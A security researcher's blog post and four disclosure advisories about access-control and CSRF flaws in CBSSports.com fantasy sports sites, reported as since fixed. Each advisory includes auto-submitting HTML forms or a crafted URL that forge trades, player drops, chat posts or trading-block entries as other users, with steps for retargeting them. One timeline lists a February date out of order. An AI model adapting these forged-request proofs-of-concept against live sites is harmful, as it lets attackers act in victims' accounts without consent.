I want to start by thanking the folks at CBS Interactive and CBS Corporation for working so diligently with me on remediating the issues I discovered, and for responsibly disclosing these issues.

I am unlikely to ever play in the NFL.

I am less likely to ever play in MLB.

So, instead I play fantasy sports, and I play primarily on CBSSports.com.  It is the site my friends were using when I joined their leagues, and haven't seen a need to change.

Last year, I discovered a few unintended features within the CBSSports sites. It started when I realized that I could CSRF the Trade and the Add/Drop functionality.  After a little more digging, I realized I didn't need to CSRF the trade functionality... Instead I could simply initiate a trade on another teams behalf.  

You would think that knowing this I should have won my league.  Personally, I blame this epic fail on Cam Newton's slow start and Brandon Lloyd's cement hands. 

 

Mrs. Newton's favorite player. 

The folks at CBS Interactive and CBS Corporation were kind enough to take a look at the issues I had discovered, remediate these issues, and keep me involved during the entire process.

Of course, I couldn't leave well enough alone, so I took another look at the site and realized there were a few other issues that should be looked at.  

I am not sure about your league, but our league utilizes a lot of smack talk. 

Smack Talk (smak tawk): 

The art of telling another person off, belittling them or calling their momma fat, while in the heat of competition.

CBSSports sites have a number of ways to accomplish this, one of which is the Live Scoreboard Chat functionality.  Fortunately (or unfortunately, depending on your point of view), I found a way to submit chat posts on behalf of other teams.  It really made the conversation devolve quickly, as seen below.

 

Sorry, this is a family friendly blog. 

Lastly, I discovered an issue where I could update my "On the Block" section with players I don't even own.  It is kind of like trying to sell someone the Brooklyn Bridge, but instead of a bridge it is Mike Trout.  The deception won't last long, but is likely to give the Trout owner a heart attack.

So, feel free to take a look at the disclosures, and if you notice anything else, please let the fine people at CBS know (security.incidents@cbs.com)!

CBSSports.com Horizontal Access Control Bypass (Trades & Add/Drop)

CBSSports.com Cross-Site Request Forgery

CBSSports.com Horizontal Access Control Bypass (Scoreboard Chat)

CBSSports.com Horizontal Access Control Bypass (Trading Block)

 

Posted
AuthorChristopher Emerson

Summary
=========
The CBSSports.com fantasy sports sites do not properly enforce access control between user accounts at the same privilege level within the application. This behavior could be leveraged by an attacker to send Trade and Add/Drop requests on behalf of an opposing team without the opposing team’s interaction, knowledge, or consent.

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 01/09/2013
Vendor fixed: 02/22/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

 Affected Products
=================
Confirmed on CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the user actually invoked the actions.  In this instance, a CBSSports.com user can successfully submit Trade and Add/Drop requests to the application on behalf of other legitimate users.

Impact
=======
A malicious user could execute Trade and Add/Drop requests on behalf of a legitimate user.

 Solution
======== 
Enforce proper access control between user accounts at the same privilege level within the application. Implement access control decisions based on the permissions granted to the authenticated user associated with the submitted session identifier.

Proof-of-Concept 
================
The following HTML code is included as a Proof-of-Concept (PoC). The PoC is designed to trick a team into offering Victor Martinez in a trade without the player’s owner initiating the request.  The code below should to be copied and pasted into an HTML file, although the actual exploit can be hosted on the Internet for ease of exploit.

To reproduce this in your own environment, the PoC will need to be modified as detailed below.

 

<html>
<body>
<form name="XSRF_Trade_Player" action="http://vanilla.baseball.cbssports.com/api/league/transactions/trade" onsubmit="window.close()" method="POST"> <input type="hidden" name="payload" value="&#123;&quot;team&#95;from&quot;&#58;&quot;8&quot;&#44;&quot;team&#95;to&quot;&#58;&quot;6&quot;&#44;&quot;comment&quot;&#58;&quot;&quot;&#44;&quot;players&quot;&#58;&#91;&quot;367942&#58;8&#58;6&quot;&#93;&#44;&quot;draft&#95;picks&quot;&#58;&#91;&#93;&#125;"/>
<input type="hidden" name="resultFormat" value="json" />
<input type="hidden" name="responseFormat" value="json" />
<input type="submit" value="Submit form" />
</form> <script> document.XSRF_Trade_Player.submit(); </script>
</body>
</html>

1. Change URL to the target league.
2. Change the value of your team's ID number to the opposing team’s ID number ('8' in the example above).
3. Change the value of the opposing team's ID number to your team’s ID number. ('6' in the example above).
4. Change the value to the player’s ID number (e.g., 367942 for Victor Martinez).

The attacker can open this file from his or her own PC.  When the file is opened, CBSSports.com will process the JSON request without confirming if the user is authorized to make the request.  

 

Figure 1. Opponent’s team containing Victor Martinez before the horizontal access control exploit.

Figure 2. Attacker’s team’s trade page displaying the no current trade offers.

Figure 3. Capture of the request that is sent when the PoC is executed.

 

Figure 4. Capture of the response that is sent when the PoC is executed.

Figure 5. Attacker’s team’s trade page displaying the unauthorized trade offer from the opponent’s team.

 

Disclosure Timeline
==================
January 9, 2013: Disclosed to vendor (CBS Corporation).
January 10, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
February 26, 2013: Confirmed successful vendor remediations.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013: Disclosed vulnerability publicly.

Posted
AuthorChristopher Emerson

Summary
=========
The CBSSports.com fantasy sports sites do not prevent unauthorized execution of sensitive operations initiated outside the authorized application workflow. This behavior could be leveraged by an attacker through a Cross-Site Request Forgery (CSRF) attack in order to modify an opponent’s team and/or lineup. 

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 01/09/2013
Vendor fixed: 02/22/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed on CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the user actually invoked the actions. When a CBSSport.com customer navigates to a page or clicks a link that includes a maliciously crafted post request, that user’s web browser makes a request to the applicable CBSSports.com fantasy site. If the user is currently authenticated to the CBSSports.com fantasy site, the scripted action within the request is executed with the privileges of the authenticated user.

 Impact
=======

Attackers could trick authenticated users into submitting malicious requests to the application, including trade offers and add/drop requests.

Solution
======== 
Utilize cryptographically secure tokens stored within a hidden field or the application URL (but not within a cookie) for all pages that perform sensitive operations. Use each token value only once. The application should verify token values before performing sensitive operatio
ns, and should terminate authenticated sessions upon encountering incorrect token values.

Alternatively, a secondary round of user authentication could be required for all requests that perform sensitive operations, performing the sensitive operations only upon successful  re-authentication. 

Proof-of-Concept 
================
White Oak Security has included sample HTML code as a Proof-of–Concept (PoC). The PoC is designed to drop placekicker Alex Henery from his owner’s team.  The code below should be copied and pasted into an HTML file, although the actual exploit can be hosted on the Internet for ease of exploit

To reproduce this in your own environment, the PoC will need to be modified as detailed below.

 

<html>
<body>
<form name="XSRF_Drop_Player" action="http://mfa55.football.cbssports.com/transactions/add-drop" method="POST">
<input type="hidden" name="form&#58;&#58;form" value="form" />
<input type="hidden" name="drop&#95;action" value="drop" />
<input type="hidden" name="form&#58;&#58;to&#95;drop" value="182335" />
</form>
<script>
document.XSRF_Drop_Player.submit();
</script>
</body>
</html>
  1. Change the URL to the target league.
  2. Change the value to the player’s ID number (e.g. 182335 for Alex Henery)

This file must then be sent to the owner of the targeted player, Alex Henery.  When the owner opens the file, the request inherits the identity and privileges of the authenticated user.  The CBSSports.com site will then process the drop request without proceeding through the site’s normal workflow and without confirming that the user actually invoked the request.

This file must then be sent to the owner of the targeted player, Alex Henery.  When the owner opens the file, the request inherits the identity and privileges of the user.  The CBSSports.com site will process the drop request without proceeding through the site’s application workflow and without confirming that the user invoked the request.

Figure 1. Test team containing Alex Henery before the CSRF exploit

Figure 2. Capture of the Request that is sent once the proof of concept is executed

The image above shows the session information and cookies that are inherited by the malicious request.

Figure 3. Test team missing Alex Henery after the CSRF exploit

 

Disclosure Timeline
==================
January 9, 2013: Disclosed to vendor (CBS Corporation).
January 10, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
February 26, 2013: Confirmed successful vendor remediation.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013: Disclosed vulnerability publicly

Posted
AuthorChristopher Emerson

Summary
=========
The CBSSports.com fantasy sports sites did not properly enforce access control between user accounts at the same privilege level within the application. This behavior could be leveraged by an attacker to post messages to the Scoreboard Chat as an opposing team without the opposing team’s interaction, knowledge, or consent.

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 08/25/2013
Vendor fixed: 09/26/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed in CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the user actually invoked the actions.  In this instance, a CBSSports.com customer can submit requests to the application on behalf of other legitimate users.

Impact
=======
A malicious user could post Scoreboard Chat messages as an opposing team's owner without the opposing team’s interaction, knowledge, or consent.   

Solution
======== 
Enforce proper access control between user accounts at the same privilege level within the application. Implement access control decisions based on the permissions granted to the authenticated user associated with the submitted session identifier.

Proof-of-Concept 
================
The following HTML form is included as a Proof-of-Concept (PoC).

To reproduce this in your own environment, the proof of concept will need to be modified as detailed below.

<html>
<body>
<form action="http://vanilla.baseball.cbssports.com/data/chat/store-message?client_type=scoreboardChat.openbaseball.mgmt" method="POST">
<input type="hidden" name="chat&#95;domain" value="vanilla&#46;baseball&#46;cbssports&#46;com" />
<input type="hidden" name="chat&#95;msg" value="&#123;&quot;event&quot;&#58;&quot;public&quot;&#44;&quot;from&quot;&#58;&quot;the_mcsass&#64;vanilla&#46;baseball&#46;cbssports&#46;com&quot;&#44;&quot;payload&quot;&#58;&#123;&quot;body&quot;&#58;&quot;Sharknado2&#92;n&quot;&#125;&#44;&quot;to&quot;&#58;&quot;vanilla&#46;baseball&#46;cbssports&#46;com&quot;&#44;&quot;type&quot;&#58;&quot;message&quot;&#125;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

  1. Change URL to the target league.
  2. Change the username value to the target user's username.
  3. Insert the message you want posted.

This file, or a link to a web hosted version of the file, can be opened by the malicious user.  When the file is opened, the request inherits the identity and privileges of the user. 

A decoded version of the request above is included to make it a little easier to read.

<html>
<body>
<form action="http://vanilla.baseball.cbssports.com/data/chat/store-message?client_type=scoreboardChat.openbaseball.mgmt" method="POST">
<input type="hidden" name="chat_domain" value="vanilla.baseball.cbssports.com" />
<input type="hidden" name="chat_msg" value="{"event":"public","from":"the_mcsass@vanilla.baseball.cbssports.com","payload":{"body":"Sharknado2\n"},"to":"vanilla.baseball.cbssports.com","type":"message"}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Disclosure Timeline
==================
August 25, 2013: Disclosed to vendor (CBS Corporation).
August 26, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
September 26, 2013: Confirmed successful vendor remediation.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013:  Disclosed vulnerability publicly

 

Posted
AuthorChristopher Emerson

Summary
=========
The CBSSports.com fantasy sports sites did not properly enforce access control between user accounts at the same privilege level within the application. This behavior could be leveraged by an attacker to send Trading Block notifications containing an opposing team's player without the opposing team’s interaction, knowledge, or consent.  

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 08/25/2013
Vendor fixed: 09/26/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

 Affected Products
=================
Confirmed in CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the user actually invoked the actions.  In this instance, a CBSSports.com customer can submit requests to the application on behalf of other legitimate users    .

Impact
=======
A malicious user could send Trading Block notifications containing an opposing team's player without the opposing team’s interaction, knowledge, or consent.  This notification does not originate from the legitimate user's account, but from the malicious user's account.

 Solution
======== 
Enforce proper access control between user accounts at the same privilege level within the application. Implement access control decisions based on the permissions granted to the authenticated user associated with the submitted session identifier.

Proof-of-Concept
================
The following URL is included as a Proof-of–Concept (PoC). The PoC is designed to execute when a malicious user clicks on the following link 

To reproduce this in your own environment, the proof of concept will need to be modified as detailed below.

http://vanilla.baseball.cbssports.com/transactions/trade/block-data/1796123/-1/-1/-1/-1/1

  1. Change the URL to the target league.
  2. Change the value to the player’s ID number (e.g., 1796123 for Jurickson Profar)

This link, when clicked by a malicious user who currently has an authenticated session to the CBS Sports fantasy league, will update the malicious user's Trade Block with the targeted player, even if they do not own said player.

The site's Trading Block will not display the target player if the malicious user does not own the target player, but email notification updates to league members will include the target player.

Here is a copy of what the request would look like when the malicious user clicks on the link:

GET /transactions/trade/block-data/1796123/-1/-1/-1/-1/1 HTTP/1.1
Host: vanilla.baseball.cbssports.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36
Accept: */*
Referer: http://vanilla.baseball.cbssports.com/transactions/trade?selected_app_id=CBS1019
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: <redacted>

Disclosure Timeline
==================
August 25, 2013: Disclosed to vendor (CBS Corporation).
August 26, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible
Disclosure policy was being drafted.
September 26, 2013: Confirmed successful vendor remediations.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013:  Disclosed vulnerability publicly

Posted
AuthorChristopher Emerson